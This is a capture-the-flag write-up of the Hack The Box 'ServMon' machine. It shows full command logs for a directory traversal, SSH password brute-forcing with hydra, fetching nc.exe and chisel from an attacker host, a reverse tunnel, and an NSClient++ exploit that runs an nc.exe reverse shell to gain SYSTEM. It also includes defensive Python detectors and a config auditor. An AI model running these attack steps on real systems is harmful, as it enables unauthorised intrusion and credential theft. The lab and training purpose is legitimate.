In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
# Nmap 7.94 scan initiated Wed Oct 25 07:09:12 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/servmon/results/10.10.10.184/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/servmon/results/10.10.10.184/scans/xml/_quick_tcp_nmap.xml 10.10.10.184
Nmap scan report for 10.10.10.184
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-25 07:09:13 EDT for 444s
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
22/tcp open ssh syn-ack OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
| 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA5iE0EIBy2ljOhQ42zqa843noU8K42IIHcRa9tFu5kUtlUcQ9CghqmRG7yrLjEBxJBMeZ3DRL3xEXH0K5rCRGY=
| 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN6c7yYxNJoV/1Lp8AQeOGoJrtQ6rgTitX0ksHDoKjhn
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack
5666/tcp open tcpwrapped syn-ack
6699/tcp open napster? syn-ack
8443/tcp open ssl/https-alt syn-ack
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after: 2021-01-13T13:24:20
| MD5: 1d03:0c40:5b7a:0f6d:d8c8:78e3:cba7:38b4
| SHA-1: 7083:bd82:b4b0:f9c0:cc9c:5019:2f9f:9291:4694:8334
| -----BEGIN CERTIFICATE-----
| MIICoTCCAYmgAwIBAgIBADANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDDAlsb2Nh
| bGhvc3QwHhcNMjAwMTE0MTMyNDIwWhcNMjEwMTEzMTMyNDIwWjAUMRIwEAYDVQQD
| DAlsb2NhbGhvc3QwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDXCoMi
| kUUWbCi0E1C/LfZFrm4UKCheesOFUAITOnrCvfkYmUR0o7v9wQ8yR5sQR8OIxfJN
| vOTE3C/YZjPE/XLFrLhBpb64X83rqzFRwX7bHVr+PZmHQR0qFRvrsWoQTKcjrElo
| R4WgF4AWkR8vQqsCADPuDGIsNb6PyXSru8/A/HJSt5ef8a3dcOCszlm2bP62qsa8
| XqumPHAKKwiu8k8N94qyXyVwOxbh1nPcATwede5z/KkpKBtpNfSFjrL+sLceQC5S
| wU8u06kPwgzrqTM4L8hyLbsgGcByOBeWLjPJOuR0L/a33yTL3lLFDx/RwGIln5s7
| BwX8AJUEl+6lRs1JAgMBAAEwDQYJKoZIhvcNAQEFBQADggEBAAjXGVBKBNUUVJ51
| b2f08SxINbWy4iDxomygRhT/auRNIypAT2muZ2//KBtUiUxaHZguCwUUzB/1jiED
| s/IDA6dWvImHWnOZGgIUsLo/242RsNgKUYYz8sxGeDKceh6F9RvyG3Sr0OyUrPHt
| sc2hPkgZ0jgf4igc6/3KLCffK5o85bLOQ4hCmJqI74aNenTMNnojk42NfBln2cvU
| vK13uXz0wU1PDgfyGrq8DL8A89zsmdW6QzBElnNKpqNdSj+5trHe7nYYM5m0rrAb
| H2nO4PdFbPGJpwRlH0BOm0kIY0az67VfOakdo1HiWXq5ZbhkRm27B2zO7/ZKfVIz
| XXrt6LA=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions, apple-iphoto, docker, hazelcast-http:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| iday
| :Saturday
| OfficeScan:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
| jobs
| metasploit-msgrpc:
| HTTP/1.1 403
| Content-Length: 20
|_ Your not allowed
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.94%T=SSL%I=9%D=10/25%Time=6538F794%P=x86_64-pc-linux-g
SF:nu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocatio
SF:n:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0\0\0\0:Saturday\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(HTTPOpti
SF:ons,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20no
SF:t\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nContent-Length
SF::\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"HTTP/1\.1\x
SF:20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(SIPO
SF:ptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x2
SF:0not\x20found")%r(OfficeScan,74,"HTTP/1\.1\x20302\r\nContent-Length:\x2
SF:00\r\nLocation:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0s\0e\0\0\0\0
SF:\0\0\0\0\0\x01\0\0\0\x01\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x0
SF:4jobs\x12\x02\x18\x02\x12\x0f")%r(apple-iphoto,36,"HTTP/1\.1\x20404\r\n
SF:Content-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(metasploit-ms
SF:grpc,70,"HTTP/1\.1\x20403\r\nContent-Length:\x2020\r\n\r\n403\x20Your\x
SF:20not\x20allowed\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(hazelcast
SF:-http,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20
SF:not\x20found")%r(docker,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r
SF:\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-10-25T11:16:21
|_ start_date: N/A
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 20065/tcp): CLEAN (Couldn't connect)
| Check 2 (port 52208/tcp): CLEAN (Couldn't connect)
| Check 3 (port 62863/udp): CLEAN (Failed to receive data)
| Check 4 (port 36627/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 25 07:16:37 2023 -- 1 IP address (1 host up) scanned in 445.25 seconds
We can log in to FTP anonymously:
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49682|)
125 Data connection already open; Transfer starting.
02-28-22 07:35PM <DIR> Users
226 Transfer complete.
ftp> cd users
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49683|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM <DIR> Nadine
02-28-22 07:37PM <DIR> Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49684|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM 168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||49685|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************| 168 0.48 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (0.48 KiB/s)
ftp> cd ../
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49686|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM <DIR> Nadine
02-28-22 07:37PM <DIR> Nathan
226 Transfer complete.
ftp> cd Nathan
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49687|)
125 Data connection already open; Transfer starting.
02-28-22 07:36PM 182 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
229 Entering Extended Passive Mode (|||49688|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************| 182 0.52 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 4 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
182 bytes received in 00:00 (0.52 KiB/s)
ftp>
We check out the two files:
╭─kali@kali ~/HTB/servmon
╰─$ ls
Confidential.txt 'Notes to do.txt' results
╭─kali@kali ~/HTB/servmon
╰─$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
╭─kali@kali ~/HTB/servmon
╰─$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
╭─kali@kali ~/HTB/servmon
╰─$
After looking around, I found it on searchsploit:
╭─kali@kali ~/HTB/servmon/results/10.10.10.184/scans/tcp8443
╰─$ searchsploit Nvms
-------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Overflow | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py
-------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
╭─kali@kali ~/HTB/servmon/results/10.10.10.184/scans/tcp8443
╰─$
Looking at the exploit, I found a Python script on GitHub: https://github.com/AleDiBen/NVMS1000-Exploit/blob/master/nvms.py
╭─kali@kali ~/HTB/servmon
╰─$ python nvms.py 10.10.10.184 Windows/win.ini win.ini
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content
++++++++++ BEGIN ++++++++++
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
++++++++++ END ++++++++++
╭─kali@kali ~/HTB/servmon
╰─$ python nvms.py 10.10.10.184 Users/Nathan/Desktop/password.txt password.txt
[-] Host not vulnerable!
╭─kali@kali ~/HTB/servmon
╰─$ python nvms.py 10.10.10.184 Users/Nathan/Desktop/passwords.txt passwords.txt
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content
++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++ END ++++++++++
╭─kali@kali ~/HTB/servmon
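The traversal above is exactly what the NVMS web logs should let a defender spot. As an added example (not from the writeup or from the nvms.py script), here is a small Python detector that normalises each requested path and flags requests that climb above the web root. It goes beyond the plain `../` form used above and also catches percent-encoded, double-encoded and backslash variants. The access-log lines are constructed samples in Common Log Format, not output captured from the target.

```python
"""Flag directory-traversal requests in web-server access logs.

Added example: each requested path is percent-decoded to a fixed point,
backslashes are treated as separators, and the '..' segments are walked to
see whether the path ever climbs above the web root.
"""
import re
from urllib.parse import unquote

# Constructed access-log lines (Common Log Format). Two payloads mimic the
# reads performed in the writeup (win.ini, passwords.txt), one is a harmless
# in-root '..', one is double-encoded, one uses backslashes.
SAMPLE_LOG = """\
10.10.14.4 - - [25/Oct/2023:10:20:01 -0400] "GET /index.html HTTP/1.1" 302 0
10.10.14.4 - - [25/Oct/2023:10:20:02 -0400] "GET /../../../../../../Windows/win.ini HTTP/1.1" 200 92
10.10.14.4 - - [25/Oct/2023:10:20:03 -0400] "GET /%2e%2e/%2e%2e/%2e%2e/Users/Nathan/Desktop/passwords.txt HTTP/1.1" 200 168
10.10.14.4 - - [25/Oct/2023:10:20:04 -0400] "GET /%252e%252e/%252e%252e/Windows/win.ini HTTP/1.1" 404 18
10.10.14.4 - - [25/Oct/2023:10:20:05 -0400] "GET /images/../css/style.css HTTP/1.1" 200 512
10.10.14.4 - - [25/Oct/2023:10:20:06 -0400] "GET /..\\..\\Windows\\win.ini HTTP/1.1" 200 92
"""

CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def decode_fully(path, max_rounds=3):
    """Percent-decode until the value stops changing, so %252e%252e is seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_webroot(raw_path):
    """True if the decoded path climbs above the web root at any point."""
    path = decode_fully(raw_path.split("?", 1)[0])
    path = path.replace("\\", "/")  # IIS-style servers accept '\' as a separator
    depth = 0
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:  # went above the root: traversal
                return True
        else:
            depth += 1
    return False


def find_traversals(log_text):
    """Return one record per traversal request; 'served' marks the ones the server answered 200."""
    hits = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m or not escapes_webroot(m["path"]):
            continue
        hits.append({
            "src": m["src"],
            "path": m["path"],
            "status": int(m["status"]),
            "served": m["status"] == "200",
        })
    return hits


if __name__ == "__main__":
    for hit in find_traversals(SAMPLE_LOG):
        flag = "SERVED" if hit["served"] else "blocked"
        print(f"{hit['src']} {hit['status']} {flag} {hit['path']}")
```

Requests the server answered with 200 are the ones to triage first: they mean the file left the box, as passwords.txt did here.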
Saved the passwords to a text file and used hydra with the usernames Nathan, Nadine and Administrator:
╭─kali@kali ~/HTB/servmon
╰─$ hydra -L user.txt -P password.txt 10.10.10.184 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-10-25 10:34:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 21 login tries (l:3/p:7), ~2 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-10-25 10:34:30
╭─kali@kali ~/HTB/servmon
╰─$
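Twenty-one tries in eight seconds followed by one success is the signature that authentication logs should catch. As an added example, not part of the writeup, the Python below implements a sliding-window detector over sshd messages: it raises one alert when a source passes the failure threshold within the window and another when a success arrives on the heels of a burst. OpenSSH for Windows emits the same "Failed password for ... from ... port ..." message text as Linux sshd (into the OpenSSH/Operational event log rather than auth.log), so the parser applies to either; the timestamp/host/PID framing and every log line here are constructed to resemble the hydra run above.

```python
"""Detect SSH password-guessing bursts and a success that follows one.

Added example: sliding-window detector over sshd 'Failed/Accepted password'
messages. Lines must be in chronological order. All sample lines are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

SSHD_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def build_sample_log():
    """Constructed: 3 users x 7 guesses from one source over ~8 s; the 20th try succeeds."""
    users = ["Administrator", "Nadine", "Nathan"]
    base = datetime(2023, 10, 25, 10, 34, 22)
    lines = []
    for i in range(21):
        ts = (base + timedelta(milliseconds=400 * i)).strftime("%Y-%m-%dT%H:%M:%S")
        outcome = "Accepted" if i == 19 else "Failed"  # i == 19 -> users[1] == "Nadine"
        lines.append(f"{ts} SERVMON sshd[{4000 + i}]: {outcome} password for "
                     f"{users[i % 3]} from 10.10.14.4 port {51000 + i} ssh2")
    # Benign tail: one typo, then a correct login from another workstation.
    lines.append("2023-10-25T10:40:01 SERVMON sshd[4100]: Failed password for Nadine from 10.10.10.50 port 60001 ssh2")
    lines.append("2023-10-25T10:40:07 SERVMON sshd[4101]: Accepted password for Nadine from 10.10.10.50 port 60002 ssh2")
    return lines


def detect_password_guessing(lines, burst_threshold=10, window_seconds=60,
                             min_failures_before_success=3):
    """Return alerts: 'guessing_burst' once per burst, 'success_after_guessing' per hit."""
    recent = defaultdict(deque)  # src -> timestamps of failures still inside the window
    alerts = []
    for line in lines:
        m = SSHD_RE.match(line)
        if not m:
            continue
        ts, src = datetime.fromisoformat(m["ts"]), m["src"]
        q = recent[src]
        while q and ts - q[0] > timedelta(seconds=window_seconds):
            q.popleft()  # expire failures older than the window
        if m["outcome"] == "Failed":
            q.append(ts)
            if len(q) == burst_threshold:  # fires once when the threshold is crossed
                alerts.append({"type": "guessing_burst", "src": src,
                               "failures": len(q), "at": m["ts"]})
        elif len(q) >= min_failures_before_success:
            # A success right after many failures is the spray/brute-force hit itself.
            alerts.append({"type": "success_after_guessing", "src": src,
                           "user": m["user"], "failures": len(q), "at": m["ts"]})
            q.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_password_guessing(build_sample_log()):
        print(alert)
```

The second alert type is the one worth paging on: a valid password landing after a burst from the same address means the account is compromised, not merely probed.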
Logging in over SSH as Nadine:
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>
Checking SMB shares:
╭─kali@kali ~/HTB/servmon
╰─$ crackmapexec smb 10.10.10.184 -u Nadine -p L1k3B1gBut7s@W0rk --shares
SMB 10.10.10.184 445 SERVMON [*] Windows 10.0 Build 17763 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
SMB 10.10.10.184 445 SERVMON [+] ServMon\Nadine:L1k3B1gBut7s@W0rk
SMB 10.10.10.184 445 SERVMON [+] Enumerated shares
SMB 10.10.10.184 445 SERVMON Share Permissions Remark
SMB 10.10.10.184 445 SERVMON ----- ----------- ------
SMB 10.10.10.184 445 SERVMON ADMIN$ Remote Admin
SMB 10.10.10.184 445 SERVMON C$ Default share
SMB 10.10.10.184 445 SERVMON IPC$ READ Remote IPC
╭─kali@kali ~/HTB/servmon
╰─$
Checked Program Files and saw NSClient++ and a changelog file in there:
nadine@SERVMON C:\Program Files>cd NSClient++
nadine@SERVMON C:\Program Files\NSClient++>dir
Volume in drive C has no label.
Volume Serial Number is 20C1-47A1
Directory of C:\Program Files\NSClient++
Got a privesc script from GitHub for NSClient++: https://github.com/xtizi/NSClient-0.5.2.35---Privilege-Escalation/blob/master/exploit.py
╭─kali@kali ~/HTB/servmon
╰─$ wget https://raw.githubusercontent.com/xtizi/NSClient-0.5.2.35---Privilege-Escalation/master/exploit.py
--2023-10-25 10:43:49-- https://raw.githubusercontent.com/xtizi/NSClient-0.5.2.35---Privilege-Escalation/master/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 911 [text/plain]
Saving to: ‘exploit.py’
exploit.py 100%[=======================================================================>] 911 --.-KB/s in 0s
2023-10-25 10:43:49 (29.4 MB/s) - ‘exploit.py’ saved [911/911]
╭─kali@kali ~/HTB/servmon
╰─$
Usage: ./exploit.py "C:\Temp\nc.exe 192.168.0.10 443 -e cmd.exe" https://192.168.0.100:443 supersecurepassword
Copy nc.exe to the machine:
nadine@SERVMON C:\>cd temp
nadine@SERVMON C:\temp>certutil -urlcache -f http://10.10.14.4:90/nc.exe c:\Temp\nc.exe
Access is denied.
nadine@SERVMON C:\temp>curl http://10.10.14.4:90/nc.exe -o nc.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 59392 100 59392 0 0 59392 0 0:00:01 0:00:01 --:--:-- 46950
nadine@SERVMON C:\temp>
I ran it, but it keeps failing:
╭─kali@kali ~/HTB/servmon
╰─$ ./exploit.py "C:\\Temp\\nc.exe 10.10.14.4 443 -e cmd.exe" https://10.10.10.184:8443 ew2x6SsGTxjRwXOT
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:1059: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.10.184'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
<Response [403]>
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:1059: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.10.184'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
<Response [403]>
╭─kali@kali ~/HTB/servmon
On checking nsclient.ini, we see it only accepts connections from 127.0.0.1.
I checked, and it uses port 8443 as the default port:
nadine@SERVMON C:\temp>netstat -an | findstr "8443"
nadine@SERVMON C:\temp>netstat -ano | findstr 8443
TCP 0.0.0.0:8443 0.0.0.0:0 LISTENING 2272
nadine@SERVMON C:\temp>
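The combination shown so far is the real weakness on this box: the API password sits in nsclient.ini where a standard user can read it, external scripts are enabled, and the only barrier is an `allowed hosts = 127.0.0.1` allow-list that checks the source address, which a local port forward defeats. As an added example, not part of the writeup or of NSClient++, here is a small Python checker over a constructed nsclient.ini beside a hardened variant. The page does not show the real file, so the contents are made up; the section and key names follow those used in NSClient++ 0.5.x sample configurations (`[/settings/default]` allowed hosts / password, `[/modules]` CheckExternalScripts / WEBServer / Scheduler, `[/settings/external scripts]` allow arguments / allow nasty characters) and should be treated as assumptions to verify against the installed file.

```python
"""Audit a constructed NSClient++ nsclient.ini for the settings that turned
an API password into a SYSTEM shell on this box. Added example; key names
are assumptions based on NSClient++ 0.5.x sample configs."""
import configparser

# Constructed weak config: loopback allow-list, plaintext password, external
# scripts with arguments. The password value is made up.
WEAK_INI = """\
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = CONSTRUCTED-PASSWORD

[/settings/external scripts]
allow arguments = true
allow nasty characters = true

[/settings/WEB/server]
port = 8443
"""

# Constructed hardened variant: no remote command-execution surface is left;
# the password still has to be protected by the file ACL.
HARDENED_INI = """\
[/modules]
CheckExternalScripts = disabled
Scheduler = disabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = CONSTRUCTED-PASSWORD

[/settings/external scripts]
allow arguments = false
allow nasty characters = false

[/settings/WEB/server]
port = 8443
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def load_ini(text):
    # No '%' interpolation (passwords may contain it); tolerate repeated keys.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def audit_nsclient_ini(text):
    """Return (severity, code, message) tuples; 'high' means a password holder gets command execution."""
    cp = load_ini(text)

    def val(section, key):
        return cp.get(section, key, fallback="").strip().lower()

    ext_scripts = val("/modules", "CheckExternalScripts") == "enabled"
    web = val("/modules", "WEBServer") == "enabled"
    hosts = {h.strip().lower() for h in val("/settings/default", "allowed hosts").split(",") if h.strip()}

    findings = []
    if ext_scripts and val("/settings/external scripts", "allow arguments") == "true":
        findings.append(("high", "external-scripts-args", "CheckExternalScripts with 'allow arguments = true': anyone holding the API password can run commands as the service account (SYSTEM here)."))
    if ext_scripts and val("/settings/external scripts", "allow nasty characters") == "true":
        findings.append(("high", "nasty-characters", "'allow nasty characters = true' passes shell metacharacters through to external scripts."))
    if ext_scripts and val("/modules", "Scheduler") == "enabled":
        findings.append(("medium", "scheduler", "Scheduler plus external scripts lets a password holder schedule commands through the API."))
    if web and hosts and hosts <= LOOPBACK:
        findings.append(("info", "loopback-allowlist", "allowed hosts is loopback-only, but it checks the source address: a local port forward makes a remote client look like 127.0.0.1, so do not treat it as the boundary."))
    if val("/settings/default", "password"):
        findings.append(("info", "plaintext-password", "API password stored in nsclient.ini: restrict the file to Administrators/SYSTEM; here a standard user could read it."))
    return findings


def high_findings(text):
    return [code for sev, code, _ in audit_nsclient_ini(text) if sev == "high"]


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"== {label} ==")
        for sev, code, msg in audit_nsclient_ini(ini):
            print(f"[{sev:6}] {code}: {msg}")
```

Even the hardened variant keeps two informational findings on purpose: the loopback allow-list and the stored password are not defects by themselves, but the audit should keep reminding the operator that the file ACL, not the address check, is what protects the service.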
We try chisel, so that our requests reach NSClient++ from 127.0.0.1.
Copy the client to the host:
Invoke-WebRequest -Uri http://10.10.14.4:90/chisel_1.9.1_windows_amd64 -OutFile C:\temp\chisel_1.9.1_windows_amd64
Chisel server on Kali:
╭─kali@kali ~/HTB/servmon
╰─$ sudo ./chisel_1.9.1_linux_amd64 server -p 8000 --reverse
2023/10/25 22:15:55 server: Reverse tunnelling enabled
2023/10/25 22:15:55 server: Fingerprint cgk8e5cIJ4bIleLprY2TeHLNwlRDZ76/3m4gAI3UhxI=
2023/10/25 22:15:55 server: Listening on http://0.0.0.0:8000
Chisel client on the target:
nadine@SERVMON C:\temp>.\chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:8443:localhost:8443
2023/10/25 19:54:45 client: Connecting to ws://10.10.14.4:8000
2023/10/25 19:54:47 client: Connected (Latency 318.0378ms)
Test the port forwarding.
Try the exploit again through the tunnel, with nc listening on 443:
╭─kali@kali ~/HTB/servmon
╰─$ sudo python ./exploit.py "C:\\Temp\\nc.exe 10.10.14.4 443 -e cmd.exe" https://10.10.14.4:8443 ew2x6SsGTxjRwXOT
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:1059: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.14.4'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
<Response [200]>
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:1059: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.14.4'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
We get a shell as NT AUTHORITY\SYSTEM:
╭─kali@kali ~/HTB/servmon
╰─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.184] 49731
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
C:\Program Files\NSClient++>